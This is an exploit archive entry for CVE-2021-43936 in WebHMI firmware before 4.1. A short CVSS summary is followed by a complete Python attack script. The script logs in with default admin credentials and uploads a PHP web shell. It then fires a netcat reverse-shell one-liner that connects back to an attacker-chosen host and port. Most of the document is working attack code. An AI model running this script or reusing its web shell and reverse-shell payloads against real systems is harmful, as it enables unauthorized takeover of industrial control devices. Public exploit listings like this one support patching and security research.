WebHMI 4.0 Remote Code Execution

2021-12-1300:00:00

Jeremiasz Pluta

packetstormsecurity.com

131

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

JSON

`# Exploit Title: WebHMI 4.0 - Remote Code Execution (RCE) (Authenticated)  
# Date: 12/12/2021  
# Exploit Author: Jeremiasz Pluta  
# Vendor Homepage: https://webhmi.com.ua/en/  
# Version: WebHMI Firmware < 4.1  
# CVE: CVE-2021-43936  
# Tested on: WebHMI Firmware 4.0.7475  
  
#!/usr/bin/python  
import sys  
import re  
import argparse  
import pyfiglet  
import requests  
import time  
import subprocess  
  
banner = pyfiglet.figlet_format("CVE-2021-43936")  
print(banner)  
print('Exploit for CVE-2021-43936')  
print('For: WebHMI Firmware < 4.1')  
  
login = "admin" #CHANGE ME IF NEEDED  
password = "admin" #CHANGE ME IF NEEDED  
  
class Exploit:  
  
def __init__(self, target_ip, target_port, localhost, localport):  
self.target_ip = target_ip  
self.target_port = target_port  
self.localhost = localhost  
self.localport = localport  
  
def exploitation(self):  
payload = """<?php system($_GET['cmd']); ?>"""  
payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f"""  
  
headers_login = {  
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',  
'Accept': 'application/json, text/javascript, */*; q=0.01',  
'Accept-Language': 'en-US,en;q=0.5',  
'Accept-Encoding': 'gzip, deflate',  
'Content-Type': 'application/json',  
'X-WH-LOGIN': login,  
'X-WH-PASSWORD': password,  
'X-Requested-With': 'XMLHttpRequest',  
'Connection': 'close',  
'Content-Length': '0'  
}  
  
url = 'http://' + target_ip + ':' + target_port   
r = requests.Session()  
  
print('[*] Resolving URL...')  
r1 = r.get(url)  
time.sleep(3)  
  
print('[*] Trying to log in...')  
r2 = r.post(url + '/api/signin', headers=headers_login, allow_redirects=True)  
time.sleep(3)  
  
print('[*] Login redirection...')  
login_cookies = {  
'X-WH-SESSION-ID':r2.headers['X-WH-SESSION-ID'],  
'X-WH-CHECK-TRIAL':'true',  
'il18next':'en',  
}  
r3 = r.post(url + '/login.php?sid=' + r2.headers['X-WH-SESSION-ID'] + '&uid=1',cookies=login_cookies)  
time.sleep(3)  
  
print('[*] Uploading cmd.php file...')  
files = {  
'file': ('cmd.php', payload, 'application/x-php')  
}  
r4 = r.post(url + '/files.php', files=files, cookies=login_cookies)  
time.sleep(3)  
  
print('[*] Setting up netcat listener...')  
listener = subprocess.Popen(["nc", "-nvlp", self.localport])  
time.sleep(3)  
  
print('[*] Executing reverse shell...')  
print('[*] Watchout for shell! :)')  
r5 = r.get(url + '/uploads/files/cmd.php?cmd=' + payload2, cookies=login_cookies)  
  
if (r5.status_code == 200):  
print('[*] Got shell!')  
while True:  
listener.wait()  
else:  
print('[-] Something went wrong!')  
listener.terminate()  
  
def get_args():  
parser = argparse.ArgumentParser(description='WebHMI Firmware <4.1 Unrestricted File Upload + Code Execution (Authenticated)')  
parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP')  
parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port')  
parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP')  
parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port')  
args = parser.parse_args()  
return args  
  
args = get_args()  
target_ip = args.url  
target_port = args.target_port  
localhost = args.localhost  
localport = args.localport  
  
exp = Exploit(target_ip, target_port, localhost, localport)  
exp.exploitation()  
  
  
`